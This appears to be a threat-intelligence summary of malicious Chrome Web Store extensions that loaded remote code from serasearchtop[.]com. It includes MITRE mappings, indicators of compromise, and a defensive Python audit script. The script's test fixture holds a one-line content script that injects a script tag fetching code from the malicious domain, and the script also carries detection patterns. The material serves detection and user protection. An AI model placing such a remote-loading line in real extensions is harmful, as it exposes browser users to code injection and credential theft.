Malicious extensions in the Chrome Web Store

Independent cybersecurity researchers uncovered a cluster of malicious Chrome extensions in the Chrome Web Store, with a total of about 87 million downloads. The extensions could load remote code, modify search results, and potentially exfiltrate data from users’ browsers.

Tags: #AutoskipForYoutube #PDFToolbox #VladimirPalant #BriskVPN #EpsilonAdblock #AdblockDragon

Keypoints

  • The investigation began with the PDF Toolbox extension, which contained suspicious code and loaded from a remote domain serasearchtop[.]com.
  • Researcher Vladimir Palant identified a couple dozen extensions with similar “additional functionality” and a combined 55 million downloads.
  • Armed with samples, researchers found 34 malicious extensions in total, with the whole set downloaded about 87 million times; Autoskip for Youtube topped at 9 million downloads.
  • The extensions were uploaded to the Chrome Web Store in 2021 and 2022 and remained for months before being removed.
  • User reviews sometimes noted adware-like replacements in search results, yet moderators largely failed to act promptly.
  • Defensive guidance emphasizes limiting extensions, checking reviews, auditing installed extensions, and using device protection.

MITRE Techniques

  • [T1189] Drive-by Compromise – The extension loaded arbitrary code from a remote server to run in the browser. “the plugin accessed a serasearchtop[.]com site, from where it loaded arbitrary code on all pages viewed by the user.”
  • [T1059.007] JavaScript – The malicious behavior originates from browser-based scripting and execution of loaded code.
  • [T1555.003] Credentials in Web Browsers – The extension could steal card details and account credentials. “Steal card details and account credentials.”

Indicators of Compromise

  • [Domain] serasearchtop[.]com – used to host or deliver malicious code to users.
  • [File] Autoskip for Youtube – one of the malicious extensions with high download counts.
  • [File] PDF Toolbox – initial extension found to contain suspicious code.
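The defensive guidance above (auditing installed extensions) and the single domain indicator can be turned into a local check. The following is an added example, not code from the article or from Kaspersky: it walks a Chrome profile's Extensions folder, flags manifests that grant access to every site (the precondition for "arbitrary code on all pages"), and greps extension sources for the serasearchtop[.]com indicator and for dynamic script-tag creation (an assumed heuristic, not something the article states). The sample extension tree it builds is constructed for the demonstration.

```python
import json, re, tempfile
from pathlib import Path
# IoC from the article, re-armed from serasearchtop[.]com so it matches real source text.
IOC_DOMAINS = ("serasearchtop.com",)
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Assumed heuristic: injecting a <script> element is the usual shape of "load remote code".
REMOTE_SCRIPT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")

def audit_extension(ext_dir):
    """Return findings for one unpacked extension directory (empty list = nothing flagged)."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    findings = []
    # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
    hosts = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    if hosts & BROAD_HOSTS:
        findings.append("broad host access: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    if any(set(cs.get("matches", [])) & BROAD_HOSTS for cs in manifest.get("content_scripts", [])):
        findings.append("content script runs on every page")
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="ignore")
        findings += [f"{js.name}: contacts IoC domain {d}" for d in IOC_DOMAINS if d in text]
        if REMOTE_SCRIPT.search(text):
            findings.append(f"{js.name}: injects a <script> element (possible remote code load)")
    return findings

def audit_profile(extensions_root):
    """Chrome stores extensions as <Extensions>/<id>/<version>/; return {id/version: findings}."""
    report = {}
    for manifest in sorted(Path(extensions_root).glob("*/*/manifest.json")):
        findings = audit_extension(manifest.parent)
        if findings:
            report[f"{manifest.parent.parent.name}/{manifest.parent.name}"] = findings
    return report

# Constructed fixture (not real store data): one benign and one suspicious extension.
SAMPLE_TREE = {
    "aaaa_benign_id/1.0/manifest.json": json.dumps(
        {"manifest_version": 3, "host_permissions": ["https://example.com/*"]}),
    "bbbb_suspect_id/2.1/manifest.json": json.dumps({"manifest_version": 2, "permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["cs.js"]}]}),
    "bbbb_suspect_id/2.1/cs.js": "var s=document.createElement('script');s.src='https://serasearchtop.com/a.js';",
}

def build_sample_profile():
    root = Path(tempfile.mkdtemp())  # writes SAMPLE_TREE into an Extensions-style temp directory
    for rel, content in SAMPLE_TREE.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content, encoding="utf-8")
    return root
```

Point `audit_profile` at a real profile's Extensions directory (for example `~/.config/google-chrome/Default/Extensions` on Linux) to list every installed extension that trips one of the checks; broad host access alone is common in legitimate ad blockers, so treat it as a prompt to look closer rather than a verdict.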

Read more: https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/